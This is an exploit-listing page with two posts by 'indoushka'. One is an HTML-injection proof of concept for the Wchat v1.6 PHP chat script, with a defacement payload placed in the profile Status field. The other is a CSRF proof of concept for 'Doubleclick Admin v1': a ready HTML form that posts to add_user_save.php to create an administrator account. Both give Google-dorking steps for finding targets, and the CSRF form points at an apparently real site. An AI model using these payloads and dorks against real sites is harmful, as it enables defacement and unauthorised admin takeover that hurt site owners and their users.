Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : Wchat v1.6 - Fully Responsive PHP AJAX Chat Script Html code inject Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : https://www.codelist.cc/scripts/235860-wchat-v16-fully-responsive-php-ajax-chat-script-nulled.html | | # Dork : Wchat - Admin Login | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] Create your account and go to "Edit profile" https://127.0.0.1/products/wchat-php-script/edit_profile.php [+] in Status Put your code [+] arbitrary html C0D3 : <marquee>Hacked by indoushka</marquee> [+] https://127.0.0.1/products/wchat-php-script/login.php Greetings to :=================================================================================================== jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg| ================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Doubleclick Admin v1 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit) | | # Vendor : https://codecanyon.net/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] The following html code create a new admin . [+] Go to the line 2. [+] Set the target site link Save changes and apply . [+] infected file : /sadmin/add_user_save.php. [+] http://127.0.0.1/q7.3/sadmin/add_user_save.php. [+] save code as poc.html . <form action="https://oecglobalnet/application/sadmin/add_user_save.php" method="post" name="formObj" onsubmit="return Check()"> <table width="96%" cellspacing="0" cellpadding="0" border="0" align="center"> <tbody><tr> <td valign="top" height="30"> <table bordercolorlight="#d9d9d9" bordercolordark="#ffffff" width="100%" cellspacing="0" cellpadding="4" bordercolor="#d9d9d9" border="1" align="center"> <tbody><tr> <td valign="middle" bgcolor="F5F5F5">ชื่อผู้ใช้งาน :</td> <td bgcolor="#FFFFFF"><input name="user" type="text" class="inputbox" id="user" size="30" maxlength="10" style="border:1px #cccccc solid" value="" onfocus="this.style.backgroundColor='ccffcc'" onblur="this.style.backgroundColor='ffffff'" onkeypress="check_userpass()"> * </td> </tr> <tr> <td valign="middle" bgcolor="F5F5F5">Level :</td> <td bgcolor="#FFFFFF"> <input type="radio" name="level" value="1"> Supper Admin <input type="radio" name="level" value="2" checked=""> Admin </td> </tr> <tr> <td valign="middle" bgcolor="F5F5F5">รหัสผ่าน :</td> <td bgcolor="#FFFFFF"><input name="pass" type="password" class="inputbox" id="pass" size="30" maxlength="30" style="border:1px #cccccc solid" value="" onfocus="this.style.backgroundColor='ccffcc'" onblur="this.style.backgroundColor='ffffff'" onkeypress="check_userpass()"> * </td> </tr> <tr> <td valign="middle" bgcolor="F5F5F5">ยืนยันหรัสผ่าน :</td> <td bgcolor="#FFFFFF"><input name="pass2" type="password" class="inputbox" id="pass2" size="30" maxlength="30" style="border:1px #cccccc solid" value="" onfocus="this.style.backgroundColor='ccffcc'" onblur="this.style.backgroundColor='ffffff'" onkeypress="check_userpass()"> * </td> </tr> <tr> <td width="14%" valign="top" bgcolor="F5F5F5">&nbsp; </td> <td width="86%" bgcolor="#FFFFFF"> <div align="left"> <input type="submit" name="Submit" value=" Save "> </div></td> </tr> </tbody></table></td> </tr> Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>